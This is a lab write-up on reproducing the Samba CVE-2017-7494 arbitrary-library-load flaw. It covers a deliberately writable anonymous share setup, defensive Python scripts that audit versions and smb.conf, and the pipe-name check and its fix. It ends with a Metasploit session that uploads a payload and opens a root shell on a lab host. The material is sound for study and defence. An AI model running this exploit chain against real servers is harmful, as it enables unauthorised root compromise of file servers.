
Samba Remote Code Execution Vulnerability (CVE-2017-7494)

Vulnerability description


Statement: the techniques, ideas and tools in this article are provided only for security-oriented learning and exchange. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves.

CVE-2017-7494 (often called "SambaCry", or the Linux counterpart of EternalBlue) is an arbitrary shared-library load in Samba's named-pipe handling, not a flaw in a reverse shell: a client that can write a file to a share can make smbd dlopen() that file by opening a named pipe whose name is the file's server-side path, which gives remote code execution with the privileges of the smbd process (normally root).

Reference: https://www.cnblogs.com/Hi-blog/p/7782356.html


Affected versions


All Samba releases from 3.5.0 onwards, up to but not including the fixed releases.

The fix shipped in 4.6.4, 4.5.10 and 4.4.14. Distribution packages usually keep their old version number after backporting the fix, so check the package changelog rather than relying on the version string alone.


FOFA query

Exploitation conditions

  • The server exposes the file/printer sharing port 445.
  • A share exists that the attacker can access and write to, e.g. one that is anonymously writable.
  • The attacker knows the server-side filesystem path of that share, because the uploaded library has to be opened by its absolute path (the Metasploit module asks the srvsvc service for this path, as seen in the log below).

Environment setup

Docker setup

cd /opt/vulhub/samba/CVE-2017-7494/
docker-compose up -d

Linux setup

Test environment: ubuntu-14.04.1-server-amd64 (select samba when installing the system)

# print the installed Samba version (smbd -V gives the same answer on a file-server-only install)
/usr/sbin/samba -V

Anonymous access configuration (recommended for testing)

# Create a shared directory
mkdir /home/share
chmod 777 /home/share

# Edit /etc/samba/smb.conf and append the following at the end of the file.
# smb.conf only treats whole lines starting with # or ; as comments, so keep
# explanations on their own lines: a trailing "# ..." after "yes" would become
# part of the value and make the boolean invalid.
[myshare]
comment = smb share test
# browseable: the share is listed when clients browse the server
browseable = yes
# writeable: clients may create files (the exploit needs this to drop its .so)
writeable = yes
# path: the directory created above
path = /home/share
# public (alias of "guest ok"): allow anonymous access
public = yes

# On Ubuntu the service can be started and stopped with:
/etc/init.d/smbd start   # start
/etc/init.d/smbd stop    # stop
/etc/init.d/smbd restart # restart
or:
service smbd start
service smbd stop
service smbd restart

Non-anonymous access configuration

# Edit /etc/samba/smb.conf as follows:
[myshare]
comment = smb share test
# browseable: the share is listed when clients browse the server
browseable = yes
# writeable: clients may create files
writeable = yes
# path: the directory created above
path = /home/share
# public = no: anonymous access is not allowed
public = no

# Add to the [global] section (user-level security is the default in Samba 4,
# but setting it explicitly makes the intent clear):
security = user


Then add a user so there is an account to log in with:

# the Samba account must exist as a system user; smbpasswd -a sets its SMB password
useradd user
smbpasswd -a user
service smbd restart
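The exploitation conditions above boil down to two things a defender can check offline: whether the running Samba predates the upstream fix, and whether any share lets a client drop a file on the server. The following Python script is an added example (not part of the original post and not Samba code) that does both: it parses a version string such as the output of `smbd -V` and an smb.conf, lists writable and anonymously writable shares, and reports whether the documented `nt pipe support = no` workaround is set in [global]. The sample smb.conf is constructed for the example; the option synonyms (`public`/`guest ok`, `writeable`/`writable`/`write ok`/`read only`) and their defaults are Samba's.

```python
"""Offline exposure check for CVE-2017-7494: version status plus writable shares in smb.conf."""
import re
from configparser import ConfigParser

# Every upstream release from 3.5.0 up to these three is affected.
FIRST_VULNERABLE = (3, 5, 0)
FIXED_RELEASES = {(4, 6): (4, 6, 4), (4, 5): (4, 5, 10), (4, 4): (4, 4, 14)}
YES = {"yes", "true", "1"}


def parse_version(text):
    """Extract x.y.z from output such as 'Version 4.3.11-Ubuntu'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(x) for x in m.groups())


def upstream_vulnerable(version_text):
    """True if an *upstream* Samba of this version lacks the fix.

    Distribution builds may carry a backported fix that the version string does
    not reveal, so treat True as 'go and read the package changelog'.
    """
    v = parse_version(version_text)
    if v < FIRST_VULNERABLE:
        return False
    fixed = FIXED_RELEASES.get(v[:2])
    if fixed is not None:
        return v < fixed
    # 4.7 and later were released with the fix; 3.5 up to 4.3 never got an upstream one.
    return v[:2] < (4, 4)


def load_smb_conf(text):
    """smb.conf is INI-like; Samba compares option names case- and whitespace-insensitively."""
    cp = ConfigParser(strict=False, interpolation=None, delimiters=("=",),
                      empty_lines_in_values=False)
    cp.optionxform = lambda name: re.sub(r"\s+", "", name).lower()
    cp.read_string(text)
    return cp


def to_bool(value, default):
    if value is None:
        return default
    return value.strip().lower() in YES


def share_is_writable(section):
    # "writeable", "writable" and "write ok" are synonyms for "read only = no";
    # Samba's default is read only = yes.
    for key in ("writeable", "writable", "writeok"):
        if section.get(key) is not None:
            return to_bool(section.get(key), False)
    return not to_bool(section.get("readonly"), True)


def share_is_guest_ok(section):
    # "public" is a synonym for "guest ok"; default is no.
    for key in ("guestok", "public"):
        if section.get(key) is not None:
            return to_bool(section.get(key), False)
    return False


def audit_smb_conf(text):
    """Report shares an attacker could use to place the .so, and whether pipes are disabled."""
    cp = load_smb_conf(text)
    glob = cp["global"] if cp.has_section("global") else {}
    pipes = glob.get("ntpipesupport")
    report = {
        "nt_pipe_support_disabled": pipes is not None and not to_bool(pipes, True),
        "writable": [],        # any writable share: exploitable by whoever can log in
        "guest_writable": [],  # writable without credentials: exploitable by anyone
    }
    for name in cp.sections():
        if name.lower() == "global":
            continue
        sec = cp[name]
        if share_is_writable(sec):
            report["writable"].append(name)
            if share_is_guest_ok(sec):
                report["guest_writable"].append(name)
    return report


# Constructed sample config: one anonymous writable share (as in the lab setup above),
# one share writable only by an authenticated user, and one read-only guest share.
SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
security = user
map to guest = bad user

[myshare]
comment = smb share test
path = /home/share
browseable = yes
writeable = yes
public = yes

[backup]
path = /srv/backup
read only = no
valid users = backup

[docs]
path = /srv/docs
guest ok = yes
"""

if __name__ == "__main__":
    print(upstream_vulnerable("Version 4.3.11-Ubuntu"))
    print(audit_smb_conf(SAMPLE_SMB_CONF))
```

Run against the real file with `audit_smb_conf(open("/etc/samba/smb.conf").read())`. A share in `guest_writable` on a server whose version is still vulnerable and whose `nt_pipe_support_disabled` is False is exactly the setup the reproduction below uses.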

Vulnerability reproduction

Root cause

In is_known_pipename(), the pipe name requested by the client was not checked for special characters. When the name was not one of the RPC pipes smbd serves itself, smbd passed it to smb_probe_module(), which treats a name beginning with '/' as an absolute filesystem path and dlopen()s it. An attacker who can write a file to a share therefore uploads a malicious shared library and then opens a pipe named with that file's absolute server-side path (the /tmp/afvoZDYY.so seen in the log below); the library's initialisation code runs inside the smbd process, typically as root. The fix rejects any pipe name containing '/'; where patching is not possible, `nt pipe support = no` in [global] is the documented workaround.
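To make the check concrete, here is an added Python model (not Samba source, which is C) of the decision is_known_pipename() makes before and after the fix. The set of built-in pipe names and the modules directory are assumptions for the example; where real smbd would dlopen() a file, the model returns the path it would have loaded, so it runs without loading anything. It also builds the two pipe names the Metasploit module tries in the log below.

```python
"""Model of the is_known_pipename() decision before and after the CVE-2017-7494 fix."""
import os

# A few of the RPC pipes smbd serves itself (assumed subset; the real list is longer).
KNOWN_PIPES = {"srvsvc", "samr", "lsarpc", "netlogon", "spoolss", "winreg", "wkssvc", "ntsvcs"}
# Assumed module install path; only used to show where a non-absolute name would resolve.
MODULES_DIR = "/usr/lib/x86_64-linux-gnu/samba"


def is_known_pipename(pipename, patched):
    """Return ('known', name), ('reject', name) or ('load', path that would be dlopen'd).

    patched=False models the vulnerable code path, patched=True the fixed one.
    """
    if patched and "/" in pipename:
        # The fix: a pipe name is a bare identifier, so any '/' is refused
        # before smb_probe_module() is ever consulted.
        return ("reject", pipename)
    if pipename.lower() in KNOWN_PIPES:
        return ("known", pipename)
    # Unknown pipe: smb_probe_module("rpc", pipename). An absolute name is
    # loaded as-is; anything else is looked up as <modules dir>/rpc/<name>.so,
    # so "../" sequences also escape the modules directory.
    if pipename.startswith("/"):
        return ("load", pipename)
    return ("load", os.path.join(MODULES_DIR, "rpc", pipename + ".so"))


def pipe_names_for_payload(server_path):
    """The two names the Metasploit module tries, in the order shown in the log below."""
    return ["\\\\PIPE\\" + server_path, server_path]


if __name__ == "__main__":
    for name in pipe_names_for_payload("/tmp/afvoZDYY.so"):
        print(name, is_known_pipename(name, patched=False), is_known_pipename(name, patched=True))
```

The first name in the list carries the `\\PIPE\` prefix and is what the module sends first; the server did not accept it in the run below (STATUS_OBJECT_NAME_NOT_FOUND), and the bare absolute path succeeded, which is the `("load", "/tmp/...")` branch of the model.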

Exploitation

Use msfconsole in Kali:

root@kali:/opt/tools/CVE-2017-3066# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] /usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.


______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|


=[ metasploit v5.0.99-dev ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 345 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

[*] Starting persistent handler(s)...
msf5 > search CVE-2017-7494

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load


msf5 > use exploit/linux/samba/is_known_pipename
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > set rhosts 192.168.77.211
rhosts => 192.168.77.211
msf5 exploit(linux/samba/is_known_pipename) > set rport 37483
rport => 37483
msf5 exploit(linux/samba/is_known_pipename) > run

[*] 192.168.77.211:37483 - Using location \\192.168.77.211\share\ for the path
[*] 192.168.77.211:37483 - Retrieving the remote path of the share 'share'
[*] 192.168.77.211:37483 - Share 'share' has server-side path '/tmp/
[*] 192.168.77.211:37483 - Uploaded payload to \\192.168.77.211\share\afvoZDYY.so
[*] 192.168.77.211:37483 - Loading the payload from server-side path /tmp/afvoZDYY.so using \\PIPE\/tmp/afvoZDYY.so...
[-] 192.168.77.211:37483 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.77.211:37483 - Loading the payload from server-side path /tmp/afvoZDYY.so using /tmp/afvoZDYY.so...
[+] 192.168.77.211:37483 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.77.211:37483) at 2021-11-12 01:12:09 -0500

ls
flag-{bmhb65f3024-ff71-45ce-9d8d-9adb0676081a}
whoami
root
